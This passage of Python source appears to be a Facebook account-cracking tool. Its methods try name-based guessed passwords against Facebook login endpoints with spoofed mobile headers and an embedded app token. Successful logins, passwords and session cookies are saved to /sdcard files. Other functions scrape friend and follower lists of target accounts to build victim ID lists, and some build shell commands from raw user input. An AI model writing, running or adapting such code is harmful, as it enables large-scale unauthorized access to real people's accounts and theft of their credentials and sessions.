print(f"\r{R} [DMC-OK] {sid} | {ps} {S}")
oks.append(sid)
open('/sdcard/DMC_OK_ids_M1.txt','a').write(sid+'|'+ps+'\n');open('/sdcard/DMC_iDs_COOKiEs_M1.txt','a').write(sid+'|'+ps+'|'+cookie+'\n')
break
elif 'www.facebook.com' in q['error']['message']:
#print(f"\r{A} [DMC-CP] {sid} | {ps} {S}")
cps.append(sid)
open('/sdcard/DMC_CP.txt','a').write(sid+'|'+ps+'\n')
else:
continue
loop+=1
except requests.exceptions.ConnectionError:
self.methodA(sid, name, ps)
def methodC(self, sid, name, psw):
try:
global oks,cps,loop
sys.stdout.write(f"\r {S}[DMC] {loop} | M3 OK/CP {len(oks)}/{len(cps)} | {S}{'{:.0%}'.format(loop/float(len(self.id)))}{S}")
sys.stdout.flush()
fs = name.split(' ')[0]
try:
ls = name.split(' ')[1]
except:
ls = fs
for pw in psw:
ps = pw.replace('first',fs.lower()).replace('First',fs).replace('last',ls.lower()).replace('Last',ls).replace('Name',name).replace('name',name.lower())
with requests.Session() as session:
data = {"adid": str(uuid.uuid4()),
"format": "json",
"device_id": str(uuid.uuid4()),
"cpl": "true",
"family_device_id": str(uuid.uuid4()),
"credentials_type": "device_based_login_password",
"error_detail_type": "button_with_disabled",
"source": "device_based_login",
"email": sid,
"password": ps,
"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32",
"generate_session_cookies": "1",
"meta_inf_fbmeta": "",
"advertiser_id": str(uuid.uuid4()),
"currently_logged_in_userid": "0",
"locale": "en_GB",
"client_country_code": "GB",
"method": "auth.login",
"fb_api_req_friendly_name": "authenticate",
"fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
"api_key": "882a8490361da98702bf97a021ddc14d"}
headers = {'User-Agent': randBuildLSB(),
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'graph.facebook.com',
'X-FB-Net-HNI': str(random.randint(20000, 40000)),
'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
'X-FB-Connection-Type': 'MOBILE.LTE',
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62',}
q = session.post("https://b-graph.facebook.com/auth/login",data=data, headers=headers, allow_redirects=False).json()
if 'session_key' in q:
ckkk = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"]);DMCb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-");cookie = f"sb={DMCb};{ckkk}"
print(f"\r{R} [DMC-OK] {sid} | {ps} {S}")
oks.append(sid)
open('/sdcard/DMC_OK_ids_M2.txt','a').write(sid+'|'+ps+'\n');open('/sdcard/DMC_iDs_COOKiEs_M2.txt','a').write(sid+'|'+ps+'|'+cookie+'\n')
break
elif 'www.facebook.com' in q['error']['message']:
# print(f"\r{A} [DMC-CP] {sid} | {ps} {S}")
cps.append(sid)
open('/sdcard/DMC_CP.txt','a').write(sid+'|'+ps+'\n')
else:
continue
loop+=1
except requests.exceptions.ConnectionError:
self.methodC(sid, name, ps)
def methodB(self, sid, name, psw):
try:
global oks,cps,loop
sys.stdout.write(f"\r {S}[DMC] {loop} | M2 OK/CP {len(oks)}/{len(cps)} | {S}{'{:.0%}'.format(loop/float(len(self.id)))}{S}")
sys.stdout.flush()
fs = name.split(' ')[0]
try:
ls = name.split(' ')[1]
except:
ls = fs
for pw in psw:
ps = pw.replace('first',fs.lower()).replace('First',fs).replace('last',ls.lower()).replace('Last',ls).replace('Name',name).replace('name',name.lower())
with requests.Session() as session:
data = {"adid": str(uuid.uuid4()),
"format": "json",
"device_id": str(uuid.uuid4()),
"cpl": "true",
"family_device_id": str(uuid.uuid4()),
"credentials_type": "device_based_login_password",
"error_detail_type": "button_with_disabled",
"source": "device_based_login",
"email": sid,
"password": ps,
"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32",
"generate_session_cookies": "1",
"meta_inf_fbmeta": "",
"advertiser_id": str(uuid.uuid4()),
"currently_logged_in_userid": "0",
"locale": "en_GB",
"client_country_code": "GB",
"method": "auth.login",
"fb_api_req_friendly_name": "authenticate",
"fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
"api_key": "882a8490361da98702bf97a021ddc14d"}
headers = {'User-Agent': randBuildHHL(),
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'graph.facebook.com',
'X-FB-Net-HNI': str(random.randint(20000, 40000)),
'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
'X-FB-Connection-Type': 'MOBILE.LTE',
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62',}
q = session.post("https://b-graph.facebook.com/auth/login",data=data, headers=headers, allow_redirects=False).json()
if 'session_key' in q:
ckkk = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"]);DMCb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-");cookie = f"sb={DMCb};{ckkk}"
print(f"\r{R} [DMC-OK] {sid} | {ps} {S}")
oks.append(sid)
open('/sdcard/DMC_OK_ids_M2.txt','a').write(sid+'|'+ps+'\n');open('/sdcard/DMC_iDs_COOKiEs_M2.txt','a').write(sid+'|'+ps+'|'+cookie+'\n')
break
elif 'www.facebook.com' in q['error']['message']:
# print(f"\r{A} [DMC-CP] {sid} | {ps} {S}")
cps.append(sid)
open('/sdcard/DMC_CP.txt','a').write(sid+'|'+ps+'\n')
else:
continue
loop+=1
except requests.exceptions.ConnectionError:
self.methodB(sid, name, ps)
def methodD(self, sid, name, psw):
global oks,cps,loop
sys.stdout.write(f"\r {S}[DMC] {loop} | M4 OK/CP {len(oks)}/{len(cps)} | {S}{'{:.0%}'.format(loop/float(len(self.id)))}{S}")
sys.stdout.flush()
fs = name.split(' ')[0]
try:
ls = name.split(' ')[1]
except:
ls = fs
try:
for pw in psw:
ps = pw.replace('first',fs.lower()).replace('First',fs).replace('last',ls.lower()).replace('Last',ls).replace('Name',name).replace('name',name.lower())
session=requests.Session()
sua = random.choice(sagent)
getlog = session.get(f'https://mbasic.facebook.com/login/device-based/password/?uid={sid}&flow=login_no_pin&refsrc=deprecated&_rdr')
idpass ={"lsd":re.search('name="lsd" value="(.*?)"', str(getlog.text)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(getlog.text)).group(1),"uid":sid,"next":"https://mbasic.facebook.com/login/save-device/","flow":"login_no_pin","pass":ps,}
session.headers = {}
session.headers.update({'Host': 'mbasic.facebook.com', 'viewport-width': '980', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"', 'sec-ch-ua-mobile': '?1', 'sec-ch-ua-platform': 'Android', 'sec-ch-prefers-color-scheme': 'light', 'dnt': '1', 'upgrade-insecure-requests': '1', 'user-agent': sua, 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'none', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'en-PK,en-GB;q=0.9,en-US;q=0.8,en;q=0.7'})
complete = session.post('https://mbasic.facebook.com/login/device-based/validate-password/?shbl=0',data=idpass,allow_redirects=False)
if 'c_user' in session.cookies.get_dict():
print(f"\r{R} [DMC-OK] {sid} | {ps} {S}")
oks.append(sid)
open('/sdcard/DMC_OK.txt','a').write(sid+'|'+ps+'\n')
break
elif 'checkpoint' in session.cookies.get_dict():
#print(f"\r{A} [DMC-CP] {sid} | {ps} {S}")
cps.append(sid)
open('/sdcard/DMC_CP.txt','a').write(sid+'|'+ps+'\n')
break
else:
continue
#time.sleep(31)
loop+=1
except requests.exceptions.ConnectionError:
self.methodD(sid, name, ps)
def pasw(self):
pw = []
clear()
print('Put limit between 1 to 30')
sl = int(input('How many password do you want to add?: '))
os.system("clear")
print(logo)
print(f'{S} [Example: first123,last1122,firstlast,last,ETC]')
print('')
if sl =='':
print('\n Put limit between 1 to 30')
elif sl > 20:
print('\nPassword limit Should Not Be Greater Than 30')
else:
for sr in range(sl):
pw.append(input(f'Password {sr+1}: '))
os.system("clear")
print(logo)
print(f"\r{A}Use flight (airplane) mode before use {S}")
print(47*"-")
print(f'{S} Total IDs : %s ' % len(self.id))
print(f'{S} Cracking Started...')
print(47*"-")
with sarfrazDMC(max_workers=30) as DMCworld:
for zsb in self.id:
try:
uid, name = zsb.split('|')
sz = name.split(' ')
if len(sz) == 3 or len(sz) == 4 or len(sz) == 5 or len(sz) == 8:
pwx = pw
else:
pwx = pw
if 'methodA' in methods:
DMCworld.submit(self.methodA, uid, name, pwx)
elif 'methodB' in methods:
DMCworld.submit(self.methodB, uid, name, pwx)
elif 'methodC' in methods:
DMCworld.submit(self.methodC, uid, name, pwx)
elif 'methodD' in methods:
DMCworld.submit(self.methodD, uid, name, pwx)
except:pass
result(oks,cps)
def remove_Tc():
os.system('rm -rf .token.txt .cookie.txt');print(f'\n{F}Logout Successfully ...')
login()
def login():
clear()
print('\x1b[00m\tLogin Using Cookies')
try:
fbcokis= input('\n\x1b[00mPut Cookies:\x1b[92m')
fact = requests.get("https://adsmanager.facebook.com/adsmanager/", cookies = {"cookie":fbcokis},headers=head).text
act = re.search("act=(.*?)&nav_source",str(fact)).group(1)
ftoken = requests.get(f"https://adsmanager.facebook.com/adsmanager/manage/campaigns?act={act}&nav_source=no_referrer", cookies = {"cookie":fbcokis}).text
eaab = re.search('accessToken="(.*?)"',str(ftoken)).group(1)
open(".tokn.txt", "w").write(eaab)
open(".cokis.txt", "w").write(fbcokis)
token = open('.tokn.txt','r').read()
info = requests.get('https://graph.facebook.com/me/?access_token='+token,cookies = {"cookie":fbcokis}).json()
print(f"{R}Login Successfully")
menu()
except Exception as error:
os.system("rm -f .tokn.txt")
print("\x1b[1;91m\n\t\t[!] Cookies Expired ")
slp(2)
login()
def public():
fbidz = []
clear()
print(logo)
global totaldmp,count,srange
try:
fbcokis = open(".cokis.txt", "r").read()
token = open('.tokn.txt','r').read()
except FileNotFoundError:
print(f"{A}Cookie Expired ")
slp(1)
cmd('rm -rf .token.txt .cokis.txt')
login()
try:
clear()
srange = int(input('How many IDs do you want to add?: ' ))
clear()
for rept in range(srange):
rept += 1
fbuid = input("[" + str(rept) + "] Put id username: ")
clear()
if fbuid=='stop':
break
ys.close()
try:
dmp = requests.get("https://graph.facebook.com/"+fbuid+"/friends?limit=5000&access_token="+token,cookies = {"cookie":fbcokis}).json()
for idnm in dmp['friends']['data']:
totaldmp+=1
fbidz.append(idnm['id'])
except KeyError:
print(f"\n{S}ID Not Found ...");pass
menu()
print(f'File Name To Dump Ids. Example /sdcard/DMC.txt')
print(47*"-")
filepath = input("Put File Name: ")
os.system('rm -rf %s'%(filepath))
clear()
apnd = open(filepath,'w')
for fbuid in fbidz:
count += 1
try:
dmp = requests.get("https://graph.facebook.com/"+fbuid+"/friends?limit=5000&access_token="+token,cookies = {"cookie":fbcokis}).json()
for idnm in dmp['friends']['data']:
apnd.write(idnm['id']+"|"+idnm['name']+'\n')
pass
fx = (str(len(open(filepath,'r').readlines())))
sys.stdout.write(f"\r\r{S}Collection IDs = [{fx}]{S}");sys.stdout.flush()
except KeyError:
pass
apnd.close()
print('')
print(47*"-")
print (f"Total IDs: {(str(len(open(filepath,'r').readlines())))}")
print(47*"-")
print (f"File Saved To : {filepath} ")
print(47*"-")
input("Press Enter To Back Menu ")
menu()
except Exception as e:
exit("[*] Error : %s"%e)
def follower():
fbidz = []
clear()
global totaldmp,count
try:
fbcokis = open(".cokis.txt", "r").read()
token = open('.tokn.txt','r').read()
except FileNotFoundError:
print(f"{A}Cookie Expired ")
slp(1)
cmd('rm -rf .tokn.txt .cokis.txt')
login()
try:
clear()
try:
fbbuid = input("Put Id Username: ")
clear()
dmp = requests.get("https://graph.facebook.com/"+fbbuid+"/friends?limit=5000&access_token="+token,cookies = {"cookie":fbcokis}).json()
for idnm in dmp['friends']['data']:
totaldmp+=1
fbidz.append(idnm['id'])
except KeyError:
print(f"{A}ID Not Public");time.sleep(1)
menu()
print(f'File Name To Dump Ids. Example /sdcard/DMC.txt')
print(47*"-")
filepath = input("Put File Name: ")
os.system('rm -rf %s'%(filepath))
clear()
apnd = open(filepath,'w')
for fbuid in fbidz:
count += 1
try:
dmp = requests.get("https://graph.facebook.com/"+fbuid+"?fields=subscribers.limit(5000)&access_token="+token,cookies = {"cookie":fbcokis}).json()
for idnm in dmp['subscribers']['data']:
apnd.write(idnm['id']+"|"+idnm['name']+'\n')
pass
fx = (str(len(open(filepath,'r').readlines())))
sys.stdout.write(f"\r\r{S}Collection IDs = [{fx}]{S}");sys.stdout.flush()
except KeyError:
pass
apnd.close()
print('')
print(47*"-")
print (f"Total IDs: {(str(len(open(filepath,'r').readlines())))}")
print(47*"-")
print (f"File Saved To : {filepath} ")
print(47*"-")
input("Press Enter To Back Menu ")
menu()
except Exception as e:
exit("[*] Error : %s"%e)
def sids():
os.system('clear')
print(logo)
try:
file_name = input('Put File Name: ')
open(file_name,'r').read()
except FileNotFoundError:
print(' File not found.')
exit()
clear()
print('\033[1;37mPut limit between 1 to 10 \033[0;97m')
limit = int(input('How many links do you want to separate?: '))
clear()
print('\033[1;37mExample: /sdcard/DMC.txt\033[0;97m')
print(47*'-')
new_save = input('Save new file as: ')
clear()
print('\033[1;37mExample: 10008,10007,10006')
print(47*'-')
y = 0
for k in range(limit):
y+=1
links = input('Put links %s: '%(y))
os.system('cat '+file_name+' | grep "'+links+'" >> '+new_save)
print(47*'-')
print('Links grabbed successfully')
print('Total grabbed links: '+str(len(open(new_save).read().splitlines())))
print('New file saved as: '+new_save)
print(47*'-')
input('Press enter to back Menu ')
menu()
def cutter():
os.system('clear')
print(logo)
print("Enter File Path / File Location \n")
DMC = input('Put File Name :')
print(" ")
sarfraz = input('Saving Put File Name :')
os.system('touch ' +sarfraz)
os.system('sort -r '+DMC+' | uniq > '+sarfraz)
os.system('clear')
print(logo)
print("Removed Successful From File : " + DMC )
print(47*'-')
print("File Saved To :" + sarfraz )
print(47*'-')
input(f"{S} Press Enter To Back DMC Menu ")
menu
#------[ MAIN MENU ]--------->>
def menu():
clear()
try:
fbcokis = open(".cokis.txt", "r").read()
token = open('.tokn.txt','r').read()
info = requests.get('https://graph.facebook.com/me/?access_token='+token,cookies = {"cookie":fbcokis}).json()
nam = info['name']
uid = info['id']
except Exception as error:print ("\n\x1b[1;91m[*] Token Expired");slp(1);login()
clear()
print(f'Name : {nam} | ID : {uid} ')
print(47*"-")
print(f'[1] Dump From Public [Simple]')
print(f'[2] Dump From Public [Ultimated-auto-separate]')
print(f'[3] Dump From Public [Ultimated]')
print('[4] Dump From Follower [Ultimated]')
print('[5] Remove Duplicate Links ')
print('[6] Seprate Links ')
print('[0] Remove Cookie ')
print(47*"-")
select = input('Select Menu: ')
if select =='1':
p_dump()
elif select =='2':
dump()
elif select =='3':
public()
elif select =='4':
follower()
elif select =='5':
cutter()
elif select =='6':
sids()
elif select =='0':
os.system('rm -rf .tokn.txt')
os.system('rm -rf .cookis.txt')
print(f'{F}Logout Successful');time.sleep(1)
menu()
def push(fbuid,file,fbcokis,token,mission,typ):
global filter,totaldmp
try:
if int(totaldmp)>=int(mission):
filter = 'Closed'
else:
#and type in idnm['id']
dmp = requests.get("https://graph.facebook.com/"+fbuid+"/friends?limit=5000&access_token="+token,cookies = {"cookie":fbcokis}).json()
print(f'\r Dumping : {fbuid} IDs : {totaldmp}')
for idnm in dmp['friends']['data']:
if idnm['id'] not in filter:
if str(typ) in idnm['id']:
filter.append(idnm['id'])
open(file,'a').write(idnm['id']+"|"+idnm['name']+'\n')
totaldmp+=1
except Exception as error:
pass
def sent(file,fbcokis,token):
global saved,totaldmp
try:
clear()
print('How Many IDs You Want To Dump \nExample : 1000,5000,10000\n')
mission = int(input('Enter limit: \x1b[1;92m'))
clear()
print('Which IDs You Want To Dump \nExample : 10008,100087,10007,mix\n')
typ = input('Links: \x1b[1;97m')
if 'mix' in typ.lower():
typ = '1'
clear()
for fbuid in saved:
fast_work(push,fbuid,file,fbcokis,token,mission,typ)
except Exception as error:
exit(f'----------------------------------------------------------\nTotal Dumped - {totaldmp} IDs \nSaved To = {file}\n----------------------------------------------------------')
def dump():
global saved,totaldmp
clear()
try:
fbcokis = open(".cokis.txt", "r").read()
token = open('.tokn.txt','r').read()
except FileNotFoundError:
login()
except:
login()
try:
print('Enter Dump ID Save Path\n')
file = input('Enter File:\x1b[1;97m ')
clear()
print('IF You Want To Back To Menu. Then Type \'B\' \n')
while True:
try:
fbuid = input('Put id username:\x1b[1;97m ')
if 'B' in fbuid.upper():
menu()
break
dmp = requests.get("https://graph.facebook.com/"+fbuid+"/friends?limit=5000&access_token="+token,cookies = {"cookie":fbcokis}).json()
for idnm in dmp['friends']['data']:
open(file,'a').write(idnm['id']+"|"+idnm['name']+'\n')
totaldmp+=1
saved.append(idnm['id'])
print(f'Total Target Found:\x1b[1;97m {len(saved)}')
slp(2)
sent(file,fbcokis,token)
break
exit('Bye Bye')
except:
print('ID Not Public')
continue
except Exception as error:
menu()
def p_dump():
global totaldmp,srange
try:
token = open('.tokn.txt','r').read()
fbcokis = open(".cokis.txt", "r").read()
except FileNotFoundError:
print(f"{A}\n\t\tCookie Not Found ...{S}")
slp(1)
cmd('rm -rf .token.txt .cookie.txt')
login()
try:
token = open('.tokn.txt','r').read()
fbcokis = open(".cokis.txt", "r").read()
except FileNotFoundError:
print(f"{A}Cookie Not Found ...{S}")
slp(1)
cmd('rm -rf .token.txt .cookie.txt')
login()
try:
clear()
srange = int(input('How many IDs do you want to add?: ' ))
clear()
print(f'{S}File Name To Dump Ids. Example /sdcard/DMC.txt\n')
filepath = input("Put File Name: ")
apnd = open(filepath , 'a')
clear()
for rept in range(srange):
rept += 1
sid = input("[" + str(rept) + "] Put id username: ")
if sid=='stop':
break
ys.close()
try:
dmp = requests.get("https://graph.facebook.com/"+sid+"/friends?limit=5000&access_token="+token,cookies = {"cookie":fbcokis}).json()
for idnm in dmp['friends']['data']:
totaldmp+=1
apnd.write(idnm['id']+"|"+idnm['name']+'\n')
except KeyError:
print(f"\n{S}ID Not Found ...");pass
print(f'{S}Total IDs : {totaldmp}')
apnd.close()
print(47*'-')
print(f"Total IDs: {totaldmp} ")
print(f"File Saved To {filepath} ")
print(47*'-')
input("Press enter to back DMC Menu ")
DMC(allkey)
except Exception as e:
print("Error : %s"%e)
def cutter():
clear()
print("Enter File Path / File Location \n")
DMC = input('Put File Name:')
print(" ")
sarfraz = input('Saving Put File Name:')
os.system('touch ' +sarfraz)
os.system('sort -r '+DMC+' | uniq > '+sarfraz)
os.system('clear')
print(logo)
print("Removed Successful From File: " + DMC )
print("New File Saved:" + sarfraz )
print(47*'-')
input(f"{S} Press Enter To Back DMC Menu ")
DMC(allkey)
def removef():
os.system('rm -rf self.file');print(f'\n{R}Files Removed Successfully ...')
DMC(allkey)
sarfraz()